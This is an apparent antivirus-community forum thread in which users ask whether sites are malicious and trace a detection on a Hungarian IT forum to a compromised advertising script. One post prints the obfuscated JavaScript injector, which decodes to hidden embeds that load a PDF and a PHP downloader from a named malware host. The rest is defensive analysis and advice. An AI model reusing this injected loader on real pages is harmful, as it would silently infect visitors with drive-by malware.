Is this a malicious site?

I’m wondering if someone could identify whether or not a site is malicious. I’m normally very careful about where I go, but I accidentally clicked on this link, and given the number of keyloggers distributed through WoW-based links/sites, I’m a bit nervous. Additionally, my PC stalled at the shutting down stage last night, and I rarely have any problems like that.

Here is the link that I am wondering if it is malicious: wow.duowan.com/0910/119283364074.html

I run Firefox with NoScript and keep Avast updated, so even if it is malicious I think I’d be ok, but I’d like some peace of mind.

Thanks,

could you please edit your post and deactivate the link (replace http with anything…) so that other users here don’t accidentally click on it and access that bad site…if it’s one, thanks :wink:

Done :smiley:

Generally, avast detection is accurate in these cases.
Isn’t it an encrypted/obfuscated script or iframe?
Wasn’t the site hacked?
Maybe you could contact its webmaster.

Everything on the site is in Chinese, so I don’t really have a way to converse with the webmaster. I did some googling to find mentions of the site, but most of that was in Chinese as well.


Welcome to the forums, noobdude. :slight_smile:

The site seems to be clean. Check the 2 links below for more information.

http://www.UnmaskParasites.com/security-report/?page=www.duowan.com/0910/119283364074.html

http://www.google.com/safebrowsing/diagnostic?site=www.duowan.com


Thanks so much! I’ll bookmark those two sites in case I have any similar issues in the future.

Hello,

Does this site contain malicious code? It’s an IT forum I’ve been using for years; Avast detected something today after an update:

http:// forum.hwsw.hu /

(with spaces)

Thanks.

Detected what exactly, and what was the URL of the detection? Nothing was found on the home page.

Thanks for the quick reply.

The following was detected with every page load:

File name: http:// clutchimedia. com/easywaytourism/favicon.php (spaces added for security)
Malware: JS:Downloader-EX [Trj]

Hi Eisengr,

An analysis of the malware can be found here: htxp://wepawet.cs.ucsb.edu/view.php?hash=2e299ed6da33faadcb0e117ba3283a98&t=1255543858&type=js
Do not visit this link with a vulnerable Flash player, or with a browser without NoScript installed; avast will flag the analyzing site and will disconnect from the dropper, which is at

Sign of “JS:ShellCode-AF [Expl]” has been found in “hXtp://wepawet.cs.ucsb.edu/view.php?hash=2e299ed6da33faadcb0e117ba3283a98&t=1255543858&type=js” file.
re: http://nepenthes.carnivore.it/csni:shellcodes:stuttgart

One should disinfect USB sticks in case of an infection with this trojan,

polonus

I find the favicon.php somewhat strange to start with, as it is normally favicon.ico, and it is a common form of hacking to either delete the favicon.ico file and create a customised 404 error page to do drive-by downloads, or to modify the favicon.ico file. So it is a bit strange to see favicon.php for a different domain.

So this isn’t the trigger page in the http:// forum.hwsw.hu / site, but the destination/payload page. I could attempt to check the favicon.php page which I suspect would confirm the detection (it does, see image), but it doesn’t find where the problem arises in http:// forum.hwsw.hu /.

Ok, the forum’s admins have analysed the problem, it seems to originate from the “keymedia” advertising:

http: // www. keymedia.hu/ keymediajs.cgi?site=hwsw

One of the guys said this is the part of the script that changes randomly and causes a malware recognition:

```
script>
try{if(FTx=‘*’)throw new TypeError(‘%’);}catch(g5oD){FTx=g5oD.message;}
RJmP=‘docN75mN65nt.wN72iter28J22r3cdiv sJ74yleJ3dN5cr22pr6fsr69tior6eN3
aabsoJ6cuteN3bJ20leftJ3aN2dr31J3000pxr3b N74opJ3ar2d10J300pxr3bN5cN22J3
eJ22)N3bdocument.wN72ite(J27r3cembr65dJ20wiN64thJ3d100 her69gN68tJ3d100
sJ72cJ3dN22N68tJ74pN3ar2fN2fN63r6cutN63himedia.J63r6fN6dJ2feasywaytN6fu
r72iJ73mN2ffJ61vicon.N70J68pr3fsN3dr591r4dUJ74nr30uN26iN64J3d2N22r20typ
eJ3dr22applicr61tr69onr2fpJ64fr22r3eJ3cJ2fembeJ64r3eJ27)J3bdr6fcumer6eN
74.wr72itr65(r27N3cemJ62ed widthN3d100 hJ65r69J67htJ3dJ3100N20sJ72J63N3
dJ22N68ttpr3aJ2fJ2fclN75N74chiJ6dr65dN69a.comN2fer61sywaytouJ72r69r73mJ
2ffavr69con.phpr3fsJ3dJ591MUN74n0ur26iJ64r3d3N22J3er3cr2femr62edN3eN27)
N3bdJ6fr63r75meJ6et.wr72J69tJ65(N22N3cN2fdivJ3eJ22)N3b’;
eval(unescape(RJmP.replace(/[NJr]/g,FTx)));

//</script
```

Hope it wasn’t a bad idea to paste it :slight_smile:

The problem now has disappeared.

Hi Eisengr,

Well, not so happy about the live link there; the curious may click and get infected, so make it non-clickable by putting hxtp instead of http or wxwe instead of www…

We now know it has malcode, but other reports give the site as an all green:
http://www.siteadvisor.com/sites/hwsw.hu
And on unmasked parasites this link is not flagged either:

link - hXtp://www.keymedia.hu/keymediajs.cgi?site=hwsw which is the malcode in question, so good we did some analysis here, and another proof that avast in these respects is "top of the bill", polonus

Sorry about the live link, I’ve edited it.

A bit unrelated: it seems that we have an epidemic. On the IT forum a LOT of guys have mentioned that their XPs have been wasted today. Description: after restart the Windows logo appears, but the GUI won’t start; instead it freezes at a black screen with a movable cursor. Same in safe mode.

Is it a virus?

At least 15 reported cases on this forum alone; all users reported having updated antivirus programs. No malware has been found after scanning. The solution, as it seems, is to boot with a Hiren’s-type boot CD and restore the registry to a previous date.

Sorry for the offtopic, but you seem to be still active :slight_smile:

Hi Eisengr,

This is an ongoing story. That is why I propagate the use of a script blocker inside a browser, like Firefox with NoScript (that Giorgio Maone extension has not been circumvented yet); also the extension RequestPolicy can block these nasties from redirected sites. On the other hand there are so many webadmins and hosters with obsolete or exploitable software, and so many users with older versions of apps full of exploits, older browser versions, not fully updated and upgraded OS and third party software, that a large community are sitting ducks for this, especially for a multitude install.
Another factor is that in this day and age firm system admins stay with XP, and the Virut file infector has proven beyond a doubt that the file protection system etc. in XP is not foolproof, to say the least.
Vista and Windows 7 have additional MUIs and added layers,

keep safe and secure is the wish of,

polonus

Hi,
when the alert appears, the best way is to send it to us (as a possible false positive – from the bottom right link of the dialog) for further analysis, because some infections are only one-time – if we try to replicate by accessing the website, we don’t get the alert.

Milos

True, but this epidemic seemed to infect all sorts of computers (different Windows SP versions, updated and not, different AV software, on different ISPs etc.), totally unconnected to each other. At least 100 machines were affected that I’m aware of.

It turned out that it’s the Daonol.F trojan (most likely). Not sure how to prevent it from happening again (besides the general methods you have recommended previously).

PS: thanks for the PM, but the credit really goes to the Hungarian guys at HWSW.hu, I was just the messenger.